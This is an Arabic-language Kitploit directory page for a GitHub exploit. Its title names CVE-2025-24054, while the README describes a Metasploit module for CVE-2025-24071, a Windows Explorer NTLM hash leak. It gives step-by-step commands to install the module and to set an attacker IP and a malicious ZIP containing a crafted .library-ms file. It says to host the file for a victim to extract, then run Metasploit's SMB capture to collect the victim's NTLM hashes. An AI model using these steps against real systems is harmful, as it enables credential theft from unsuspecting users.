Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-24054 — POC لـ CVE-2025-24054 | Kitploit
أدوات/GitHubGitHub/fomovet/cve-2025-24054
أطر اختبار الاختراقأطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالالقيادة والسيطرة
GitHubfomovet/cve-2025-24054

cve-2025-24054

POC لـ CVE-2025-24054

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24071: تسرب تجزئة NTLM عبر ملف .library-ms (وحدة Metasploit)

يحتوي هذا المستودع على وحدة Metasploit لاستغلال ثغرة CVE-2025-24071، وهي ثغرة في مستكشف Windows تؤدي إلى تسرب تجزئات NTLM عند استخراج ملف .library-ms ضار من أرشيف ZIP.

تم التطوير بواسطة: FOLKS-IWD


نظرة عامة

تحدث الثغرة عندما يقوم المستخدم باستخراج أرشيف ZIP يحتوي على ملف .library-ms مُعد خصيصًا. يقوم مستكشف Windows تلقائيًا ببدء طلب مصادقة SMB إلى خادم بعيد محدد في الملف، مما يؤدي إلى تسرب تجزئة NTLM الخاصة بالمستخدم دون أي تفاعل من المستخدم.

تقوم وحدة Metasploit هذه بما يلي:

  1. إنشاء ملف .library-ms ضار.
  2. ضغطه في أرشيف ZIP.
  3. التكامل مع وظيفة التقاط SMB في Metasploit لجمع تجزئات NTLM. image

التثبيت

  1. استنساخ المستودع:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
تنزيل الأداة
  • انسخ الوحدة إلى دليل وحدات Metasploit الخاص بك:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    
  • الاستخدام

    1. تحميل الوحدة:
      root@kitploit:~
      use auxiliary/server/ntlm_hash_leak
      
    2. تعيين الخيارات المطلوبة:
      root@kitploit:~
      set ATTACKER_IP 192.168.1.162  # استبدل بعنوان IP الخاص بك
      set FILENAME exploit.zip       # اسم ملف ZIP الضار
      set LIBRARY_NAME malicious.library-ms  # اسم ملف .library-ms
      set SHARE_NAME shared          # اسم مشاركة SMB
      
    3. تشغيل الوحدة:
    root@kitploit:~
      run
    
    1. ستقوم الوحدة بإنشاء ملف ZIP ضار (exploit.zip). قم باستضافة هذا الملف ليتمكن الضحية من تنزيله واستخراجه.
    2. استخدم وحدة التقاط SMB في Metasploit لجمع تجزئات NTLM:
      root@kitploit:~
      use auxiliary/server/capture/smb
      set SRVHOST 192.168.1.162  # نفس ATTACKER_IP
      run